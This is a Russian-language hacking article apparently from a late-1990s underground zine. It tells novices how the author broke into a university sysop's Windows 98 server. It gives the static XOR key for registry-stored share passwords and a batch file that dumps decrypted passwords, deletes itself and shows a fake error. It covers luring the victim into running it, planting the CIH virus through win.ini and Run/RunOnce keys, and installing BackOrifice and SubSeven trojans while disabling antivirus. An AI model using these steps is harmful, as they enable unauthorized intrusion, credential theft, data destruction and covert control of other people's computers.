• Партнер

  • Начну я, пожалуй,
    с того, что сие повествование я адресую всем
    тем, кого передергивает от слов IP/TCP, socket,
    cgi-script ну и такое-всякое, то есть самым, что
    ни на есть, зеленым хакерам, типа “ну не
    знаю я, что это такое, но очень хочется
    залезть в главный компьютер и исправить
    результаты вчерашнего зачета, а на взлом И-Нета
    мне просто на*рать”. Тем более, что материал,
    о котором пойдет речь, как правило, очень
    актуален для самых разных вузов-втузов, где
    все просто влюблены в Винды.

    А теперь все
    громко хором: WINDOWS MUST DIE !!! Да, знаю, я – не
    единственный такой продвинутый мэн,
    который открыл этот великий закон. Но все-таки ! Я еще никогда не видел такой большой
    дыры (хм, сильно сказал : ), которую к тому же
    еще и предлагают ЗА ДЕНЬГИ. И при этом в
    каждой новой версии эта дыра растет – не
    только в размерах (это я плачусь на объем
    драгоценного free space на моем винте), но и в
    количестве элементарных ошибок и недочетов,
    которые допустили Мистеры
    Квалифицированные, Продвинутые,
    Дипломированные и Жутко-Жутко Важные
    Программисты компании МикроМягкий во главе
    с их толстосумом Билли. Это же непостижимо
    – напридумать кучу API-функций, в которых
    сами же, наверное, ногу сломают, и не
    придумать более-менее божеский алгоритм
    шифрования паролей сетевого доступа ! Но
    это я забегаю вперед.

    А началось все с
    того, что у нас на факе (ака факультете – это
    для парней, что в море) провели сетку. “Великолепную”
    Microsoft-сетку, даже не на NT, а на дебильных 95/98,
    что в принципе ничего не меняет. Объявился у
    нас очень-очень важный гуманоид по имени
    ШизОп (это системный оператор - опять же,
    объясняю для особо одаренных). Ну, обозначим
    его в нашем повествовании именем Mr.W (вдруг
    он увидит эту статью – я еще хочу жить). Этот,
    значит, Mr.W сидит на своем серваке, опять же
    под Виндой, и с помощью программки WinProxy (фигня
    – под стать Windows) раздает, кому хочет, доступ
    в Инет по каким хочет протоколам. Ясно, что
    меня он не особо любит и уважает (а зря),
    поэтому только в праздничные и критические
    дни, если будет полнолуние, короче – когда
    свинья в желтых тапочках на вишню залезет, я
    могу надеяться на паршивый HTTP-доступ. А как
    же FTP, мыло (ё-mail) и все такое ? Это же
    безобразие !

    Вот тогда-то я и
    начал думать про взлом. Наш гениальный
    герой Mr.W вообще-то очень не любил тупо
    сидеть за серваком, а любил он играться в
    компьютерном классе в... хм, пожалуй это
    неважно. Вся идея в том, что он на серваке
    сделал диск С сетевым с полным доступом для
    чтения и запароленным для записи ! Ну, оно и
    понятно – если что, все можно заметить и
    изменить с другого компа, но сеть же сделана
    под Виндой ! В этом была его “последняя
    ошибка Резидента”.

    Истинные
    компьютерные асы, конечно сейчас же начнут
    трепаться про всякую техническую ерунду, но
    я тогда был молод, замучен учебой и хотелось
    “всего и прямо сейчас”. Поэтому, зная, что
    МастДай все пишет в регистре (почти все ;-)),
    то туда я и полез. Значится, создаю я папочку
    с исконно русским и близким названием Fignya и
    – оп-ля ! – делаю ее сетевым ресурсом с
    ограниченным доступом. И есессно ставлю на
    нее пароль для чтения и для доступа – все
    как полагается, а пароли, кстати, такие
    благозвучные: АААААААА и zzzzzzzz
    соответственно. Зачем – это я потом объясню.

    Ну а теперь лезем
    в реестр Regeditом (эта такая крутая
    программулина-взломщик, распространяется
    на сайте www.debil.com J ) и запускаем поиск Fignya. И
    благополучно находим – в разделе
    HKEY_LOCAL_MACHINE\  SOFTWARE\Мicrosoft\Windows\CurrentVersion\
    Network\LanMan\Fignya. И все там и хранится вплоть до
    паролей – в параметрах Parm2enc и Parm1enc.
    Выглядят они так:

    "Parm2enc"=hex:74,db,0c,e7,12,e8,95,2b

    "Parm1enc"=hex:6f,c0,17,fc,09,f3,8e,30

    Тут теперь и венику
    понятно – они зашифрованы. Но исходные же
    пароли (AAAAAAAA и zzzzzzzz) мы знаем ! А теперь
    первое золотое правило: в МикроМягкий
    МастДай никто никаких крутых
    криптографических алгоритмов не вставлял !
    Все там втупую крутится на операции XOR,
    которая есть даже в мастдаевском
    куркуляторе. Быстренько разXORив пароли из
    реестра с ASCII-кодами буковок “A” и “z” и
    поэкспериментировав со сменами пароля, я
    ужаснулся – этот “крутой” алгоритм
    заключался в поэлементном XOR с членами
    статического массива байтов ! Если по-человечески,
    то пароль шифровки – один и тот же ВСЕГДА, а
    раскодировать можно, если вручную – то на
    простом калькуляторе ! Честно говоря, я
    ожидал большего и целых полдня бился,
    почему я никак не могу различать в
    кодировке заглавные и прописные буквы, а
    потом оказалось, что и сама Винда их не
    различает (попробуйте на запрос пароля “МастДай”
    ответить “мастдай” – все равно покатит).

    Но мы-то – крутые
    хацкеры и не под стать таким все время
    щелкать кнопками на куркуляторах. Немножко
    поднапрягая извилины, я написал программку
    на ТурбоПасе (назвал я ее Windows NetPasswords Decoder,
    она в файле depassd.exe), которая
    все пароли из реестра расшифровывает и
    подает на блюдечке с каемочкой цвета
    сексуальных меньшинств. Если хотите чего-нибудь
    круче написать – с гуевым интерфейсом и все
    такое – пожалуйста, алгоритм шифрования –
    каждый элемент пароля XORится с элементом
    массива

    (53,154,77,166,83,169,212,106), т.е.
    первый элемент – с 53, второй – с 154 и т.д., и т.п.,
    ч.т.д. и др.

    А теперь
    возникают проблемы – как же узнать
    заветные циферки из реестра? В моем случае
    – просто подключить сетевой реестр с
    доступом “только для чтения” (он у меня был
    не запароленный) и прочитать, а что если
    доступа нет ВООБЩЕ ? В таком случае
    предлагаю другую программку MD’9x Shared Resource
    Viewer, она в файле passd.exe, которая
    выводит полный список сетевых ресурсов и их
    полную инфу, в т.ч. и расшифрованные пароли.
    К ней можно написать маленький batch-файл, где
    переправить вывод в какое-нибудь другое
    место, не на экран, вот так:

    @passd.exe > b:\MyPas\pass.txt
    - шлем на диск B
    @del passd.exe - это для заметания следов
    @echo Bad archive – crk error. Operation
    terminated

    Можно теперь
    создать какую-нибудь инсталляшку, можно тем
    же WinZipом, причем в качестве командного
    параметра после распаковки выдать batch-файлик,
    чтобы он сразу же и запустился. А потом
    приходим к врагам и предлагаем
    отинсталлировать “крутое расширение WinSocket”
    – в общем, обещаете золотые горы, если этот
    файл запустят на серваке. А потом в слезах
    говорите: “Блин, опять этот тупой Getright
    хреново скачал ! Где же я его теперь найду,
    этот прекрасный и нужный файл !” Короче,
    импровизируйте.

    Ну ладно,
    получили мы полный доступ на диск С – что
    теперь? Со всех сторон глупый вопрос. Мы же
    теперь шо хошь можем на комп писать! Хочешь,
    например, чтобы у врага завелся Чернобыль –
    копируешь его в любую папку и лезешь, нет, не
    в Автозагрузку, не в autoexec.bat и даже не в
    winstart.bat – это все старо и пошло, мы же в
    крутейшей операционной системе Windows!
    Поэтому лезем в файлик Win.ini, что в папочке С:\Windows\
    и благополучно в разделе [Windows] пишем Run=C:\LyubayaPapka\zaraza.bat.
    А bat-файлик вот такусенький:

    @echo off
    Cih.exe
    Del cih.exe

    Ну понятно, что
    cih.exe - то и есть вирус, который после запуска
    удаляется, чтобы замести следы. Но только
    потом система ругаться начнет – где, типа,
    файл Cih.exe? Можно, конечно, и не писать bat, а
    влепить в строку сразу вирус – пущай,
    дескать, с каждой перезагрузкой
    запускается, но еще лучше сделать по-другому.

    Мы уже говорили,
    что есть в МастДае классное место – реестр.
    Мы уже даже из него кое-что брали. Но теперь-то
    мы в него и писать можем ! Так вот, есть там
    такие классные разделы:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
    CurrentVersion\Run

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
    CurrentVersion\RunOnce

    Вот лезем туда и
    создаем новый строковый параметр с любым
    именем и даем ему в качестве значения
    полный путь к файлу. Особенно мне нравится
    служба RunOnce – она исполняется только один
    раз при загрузке, а потом сама же и
    удаляется. Вот и решена проблема “заметания
    следов”.

    Кстати, для особо
    нетерпеливых рекомендую использовать
    такие программки, как нюкеры. Они
    подвешивают сетевую машину врага,
    заставляют его перегрузиться и – оп-ля, мы
    его делаем.

    А вообще,
    пакостить – это нехорошо. Приличные люди (читай
    – я) так не поступают. А поступают они так:
    шуруют на машину врага сервер любого трояна,
    запускают его там и получают полный доступ.
    Очень рекомендую BackOrifice 2000 (www.bo2k.com)
    и SubSeven 2.1.3 (subseven.slak.org),
    в принципе, подойдут и любые другие, но эти
    – настоящий RULEZZZ. Уж не сочтите за рекламу.

    А теперь
    спокойненько запускаем у себя клиента (смотри
    не перепутай клиента с сервером, Кутузов : )
    и наслаждаемся своей крутизной. Я, когда
    получил такой доступ на сервак Mr.W получил
    чувство, сходное только разве что с
    оргазмом (оно и понятно – молодой еще был,
    чуть ли не впервые сетку взломал). А теперь
    можем удалять-создавать, что угодно. Но не
    спешите сразу убивать ненавистных DrWebа и AVP.
    Просто сидите тихо и не выпендривайтесь,
    хлопая сидюком, матерясь в динамик и
    отключая мышку, благо такие функции есть –
    без особой причины никто комп на вирусы
    проверять не станет, разве что из-за
    паранойи, а если вдруг заметите в списке
    процессов антивирус – мило прервите его,
    используя троянские функции, и пошлите
    системное сообщение, дескать, антивирус –
    дерьмо и работать отказывается по причине
    отсутствия библиотеки TualBumaga. Короче говоря
    – экспериментируйте ! Особенно умные могут
    подредактировать антивирусов так, что они
    не будут распознавать “нужных” троянов. И
    очень рекомендую на машину врага поставить
    несколько троянов – один главный и парочку
    вспомогательных, которые только и умеют,
    что выполнять командную строку и
    копировать файлы – это на случай, если
    главного кто-то убьет, а заново все делать в лом – тогда просто скопируете сервер
    главного и запустите его.

    На моей практике
    все было так. Поставил я Mr.W BackOrifice, DeltaSource и
    RatHead (где я их взял – не скажу, ищите 😉 ).
    Главного ШизОп убивал разов пять, но он все
    возвращался и возвращался. Более того,
    несмотря на то, что из-за вполне понятного
    испуга Mr.W вообще никогда не запускал WinProxy,
    трафик все рос и рос (я запускал его сам в
    невидимом режиме – см. доки к BackOrifice ).
    Короче, веселья было – вагон и маленькая
    тележка.

    Мораль истории:
    Если так уж полюбите долбанную Винду, хотя бы
    не делайте диск С сетевым! Всеобщие
    аплодисменты... Занавес...

    Опять-таки, это
    все материал для начинающих. Но, думаю, и для
    продвинутых хацкеров он будет интересен.
    Вполне возможно, что этот простейший метод
    у кого-то вызовет новые порывы добить
    дырявую, как старый ковер, Винду. В любом
    случае я буду только рад узнать про ваши
    личные достижения в этом вопросе, так что –
    удачного хака и шлите письма!

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии